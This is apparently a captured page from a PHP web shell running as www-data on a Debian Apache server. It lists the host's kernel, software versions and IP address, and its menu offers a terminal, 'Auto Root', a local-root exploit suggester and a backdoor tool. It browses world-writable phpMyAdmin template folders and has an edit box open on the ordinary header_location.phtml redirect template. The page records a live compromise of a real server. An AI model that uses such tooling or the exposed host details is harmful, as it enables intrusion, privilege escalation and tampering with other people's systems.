Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
phpmyadmin /
templates /
Delete
Unzip
Name
Size
Permission
Date
Action
columns_definitions
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
components
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
database
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
error
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
javascript
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
list
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
navigation
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
privileges
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
server
[ DIR ]
drwxrwxrwx
2020-08-24 23:50
table
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
test
[ DIR ]
drwxrwxrwx
2022-03-20 10:35
header_location.phtml
869
B
-rw-r--r--
2017-01-23 20:20
prefs_autoload.phtml
658
B
-rw-r--r--
2017-01-23 20:20
preview_sql.phtml
382
B
-rw-r--r--
2017-01-23 20:20
secondary_tabs.phtml
188
B
-rw-r--r--
2017-01-23 20:20
startAndNumberOfRowsPanel.phtml
892
B
-rw-r--r--
2017-01-23 20:20
Save
Rename
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Manage HTML redirection * * @package PhpMyAdmin-template * * @param string $uri Redirection location */ $uri = isset($uri) ? $uri : null; ?> <html> <head> <title>- - -</title> <meta http-equiv="expires" content="0" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Refresh" content="0;url=<?= htmlspecialchars($uri) ?>" /> <script type="text/javascript"> //<![CDATA[ setTimeout("window.location = decodeURI('<?= PMA_escapeJsString($uri) ?>')", 2000); //]]> </script> </head> <body> <script type="text/javascript"> //<![CDATA[ document.write('<p><a href="<?= PMA_escapeJsString(htmlspecialchars($uri)) ?>"><?php echo __('Go') ?></a></p>'); //]]> </script> </body> </html>